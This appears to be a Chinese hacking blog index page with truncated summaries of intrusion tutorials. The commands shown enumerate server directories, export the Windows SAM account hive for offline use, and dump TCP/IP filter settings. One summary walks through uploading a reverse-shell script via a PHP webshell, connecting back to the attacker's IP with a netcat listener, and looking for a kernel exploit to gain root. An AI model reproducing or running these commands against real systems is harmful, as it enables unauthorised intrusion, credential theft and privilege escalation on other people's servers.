天黑再动手

该文被密码保护。 阅读全文

摘要： 列出d的所有目录：for /d %i in (d:\freehost\*) do @echo %i把当前路径下文件夹的名字只有1-3个字母的显示出来：for /d %i in (???) do @echo %i以当前目录为搜索路径，把当前目录与下面的子目录的全部EXE文件列出：for /r %i in (*.exe) do @echo %i以指定目录为搜索路径，把当前目录与下面的子目录的所有文件列出：for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i这个会显示a.txt里面的内容，因为/f的作用，会读出a. 阅读全文

摘要： 首先导出注册表：Windows 2000：regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"Windows 2003：reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg 注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略） 接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机， 阅读全文

摘要： TCP/IP筛选在注册表里有三处，分别是：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TcpipHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TcpipHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip分别用以下命令来导出注册表项：regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpipregedit -e D:\b.reg 阅读全文

摘要： 先在网站目录上传1.pl,是个反弹脚本Phpshell执行chmod +x 1.pl，给1.pl执行权限，图0然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224，图1 反弹成功输入idbash-3.2$ iduid=529(zeicom) gid=525(zeicom) groups=525(zeicom)bash-3.2$这里uid=529(zeicom)还不是root权限，输入uname –r返回：2.6.18-164.11.1.el5PAE找对应的exp, 这里地址整理很齐全可以这里下http://bbs.tian6.com/linux_exp/in 阅读全文